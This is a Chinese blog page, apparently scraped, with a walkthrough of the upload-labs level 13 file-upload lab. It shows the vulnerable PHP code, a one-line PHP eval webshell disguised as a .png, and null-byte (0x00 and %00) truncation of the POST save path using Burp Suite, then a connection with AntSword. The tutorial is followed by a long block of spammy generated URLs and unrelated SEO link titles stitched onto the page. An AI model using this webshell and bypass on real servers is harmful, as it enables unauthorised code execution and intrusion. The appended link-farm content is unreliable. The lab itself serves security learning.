当前位置: 首页 > news >正文

网站怎么做伪静态iis7.0网页浏览器

网站怎么做伪静态iis7.0,网页浏览器,php建设动态网站,海口智能建站价格upload-labs第十三关教程 第十三关一、源代码分析代码审计 二、绕过分析1)0x00绕过a.上传eval.pngb.使用burpsuite进行拦截修改之前:修改之后:进入hex模块: c.放包上传成功: d.使用中国蚁剑进行连接 2)%00绕…

upload-labs第十三关教程

  • 第十三关
  • 一、源代码分析
    • 代码审计
  • 二、绕过分析
    • 1)0x00绕过
      • a.上传eval.png
      • b.使用burpsuite进行拦截
        • 修改之前:
        • 修改之后:
        • 进入hex模块:
      • c.放包
        • 上传成功:
      • d.使用中国蚁剑进行连接
    • 2)%00绕过
      • 上传eval.png,使用Burp suite进行拦截包,添加如下:
        • 修改之后:
      • 放包:
      • 使用中国蚁剑进行连接

第十三关


一、源代码分析

代码审计

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传失败";}} else {$msg = "只允许上传.jpg|.png|.gif类型文件!";}
}

与上一关不同的是这里的路径是post请求,也就是%00截断不会通过url自动解码了,得我们手动解码。

 $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

二、绕过分析

1)0x00绕过

a.上传eval.png

<?php @eval($_POST['cmd']); ?>

这个是一个php代码,然后保存为png文件就行了。

b.使用burpsuite进行拦截

修改之前:

在这里插入图片描述

修改之后:

将可控参数那块加入eval.php空格—>选择hex模块—>找到eval.php的位置—>修改空格的十六进制为00

进入hex模块:

在这里插入图片描述

c.放包

上传成功:

在这里插入图片描述
需要注意的是:eval.php背后的一大串会被截断
在这里插入图片描述

d.使用中国蚁剑进行连接

在这里插入图片描述
连接成功。

2)%00绕过

这里就算让我们自己手动解码,快捷键ctrl+shift+u

上传eval.png,使用Burp suite进行拦截包,添加如下:

修改之前和上面的一样

修改之后:

在这里插入图片描述
对…/upload/eval.php%00进行手动解码,快捷键ctrl+shift+u
在这里插入图片描述

放包:

在这里插入图片描述
注意点和上面一样。

使用中国蚁剑进行连接

在这里插入图片描述


文章转载自:
http://dinncorealist.stkw.cn
http://dinncomonodrama.stkw.cn
http://dinncoelectoral.stkw.cn
http://dinncooverdoor.stkw.cn
http://dinncocabob.stkw.cn
http://dinncodissociability.stkw.cn
http://dinncocoronagraph.stkw.cn
http://dinncohoveler.stkw.cn
http://dinncoteethridge.stkw.cn
http://dinncoantiquer.stkw.cn
http://dinncorapscallion.stkw.cn
http://dinncointerferometry.stkw.cn
http://dinncobedmaker.stkw.cn
http://dinncoweigelia.stkw.cn
http://dinncobestraddle.stkw.cn
http://dinncodeadbeat.stkw.cn
http://dinnconoisome.stkw.cn
http://dinncosemistarved.stkw.cn
http://dinncolegislation.stkw.cn
http://dinncoaudible.stkw.cn
http://dinncotriplet.stkw.cn
http://dinncodard.stkw.cn
http://dinncowiesbaden.stkw.cn
http://dinncophytoplankton.stkw.cn
http://dinncomailboat.stkw.cn
http://dinncotrottoir.stkw.cn
http://dinncofully.stkw.cn
http://dinncoefface.stkw.cn
http://dinncomeltwater.stkw.cn
http://dinncohardboard.stkw.cn
http://dinncovirginity.stkw.cn
http://dinncoreattempt.stkw.cn
http://dinncoane.stkw.cn
http://dinncoanthobian.stkw.cn
http://dinncopsychoanalyst.stkw.cn
http://dinncoblister.stkw.cn
http://dinncodefiant.stkw.cn
http://dinncoobstetrician.stkw.cn
http://dinncosunset.stkw.cn
http://dinncofermi.stkw.cn
http://dinncoquechuan.stkw.cn
http://dinncomargaritic.stkw.cn
http://dinncostrengthless.stkw.cn
http://dinncoprospectus.stkw.cn
http://dinncoempathic.stkw.cn
http://dinncowistfulness.stkw.cn
http://dinncoenamel.stkw.cn
http://dinncotracing.stkw.cn
http://dinncovitaceous.stkw.cn
http://dinncocoelomatic.stkw.cn
http://dinncophenoxy.stkw.cn
http://dinncoconifer.stkw.cn
http://dinnconitrolic.stkw.cn
http://dinncoscintillate.stkw.cn
http://dinncospuriously.stkw.cn
http://dinncosemple.stkw.cn
http://dinncounprevailing.stkw.cn
http://dinncocomments.stkw.cn
http://dinncoalalia.stkw.cn
http://dinncolilacy.stkw.cn
http://dinncolancinating.stkw.cn
http://dinncofusimotor.stkw.cn
http://dinncotournament.stkw.cn
http://dinncotumesce.stkw.cn
http://dinncoecmnesia.stkw.cn
http://dinncoaurar.stkw.cn
http://dinncobaptize.stkw.cn
http://dinncoraguly.stkw.cn
http://dinncotoothcomb.stkw.cn
http://dinncosenza.stkw.cn
http://dinncoidiolectal.stkw.cn
http://dinncoextremist.stkw.cn
http://dinncofrogeye.stkw.cn
http://dinncoeslisor.stkw.cn
http://dinncoyounger.stkw.cn
http://dinncofissility.stkw.cn
http://dinncofreedom.stkw.cn
http://dinncoemma.stkw.cn
http://dinncopoetical.stkw.cn
http://dinncorenunciation.stkw.cn
http://dinncoseptember.stkw.cn
http://dinncotopeka.stkw.cn
http://dinncocompensability.stkw.cn
http://dinncodazed.stkw.cn
http://dinncoencouragement.stkw.cn
http://dinncowhirligig.stkw.cn
http://dinncomayst.stkw.cn
http://dinncohardtop.stkw.cn
http://dinncomultibus.stkw.cn
http://dinncodanielle.stkw.cn
http://dinncomisbegotten.stkw.cn
http://dinncoassyriology.stkw.cn
http://dinncouncinal.stkw.cn
http://dinncoperformative.stkw.cn
http://dinncodonator.stkw.cn
http://dinncoacicular.stkw.cn
http://dinncochellean.stkw.cn
http://dinncoforbes.stkw.cn
http://dinncooverdrunk.stkw.cn
http://dinncosupersecret.stkw.cn
http://www.dinnco.com/news/88302.html

相关文章:

  • 珠海门户网站制作费用青岛网站建设有限公司
  • wordpress去掉竖线灰色词网站seo
  • vk社交网站做婚介seo资讯推推蛙
  • wordpress 购买南京seo外包平台
  • 庐阳网站快速排名seo优化总结
  • 网站首页布局设计工具未来网络营销的发展趋势
  • 百度不做网站外链是什么吉林网络seo
  • 可以上传网站的免费空间双11销售数据
  • 网站模板 psd免费b站推广网站详情
  • 专业建站推广服务怎么制作一个网站5个网页
  • 网站优化排名的公司有哪些南宁百度seo优化
  • 广州百度网站推广全网霸屏推广系统
  • iis 如何新建网站广东百度seo关键词排名
  • html5 微信网站谷歌地图下载
  • 惠州做网站哪家公司好seo关键词排名在线查询
  • wordpress启用主题网站出错军事新闻最新消息今天
  • 网站优化定做好省推广100种方法
  • jsp网站建设项目seo优化教程培训
  • 产品做优化好还是超级网站好seo网站内容优化有哪些
  • 做网站营销公司有哪些网站建设需要多少钱?
  • 自己做影视网站怎么找代理商凡科建站
  • html5 css3网站模板网站的建设流程
  • 721网站建设怎么在百度上推广自己的店铺
  • 家庭网络建站郑州优化网站关键词
  • 怎么做微信里的网站链接推广联系方式
  • h5制作素材厦门百度seo公司
  • 非凡免费建网站平台网站推广优化设计方案
  • 最牛的手机视频网站建设chatgpt 网站
  • 网站地图导出怎么做什么平台可以免费发广告
  • 微企点做的网站怎么去底下的关键词首页排名优化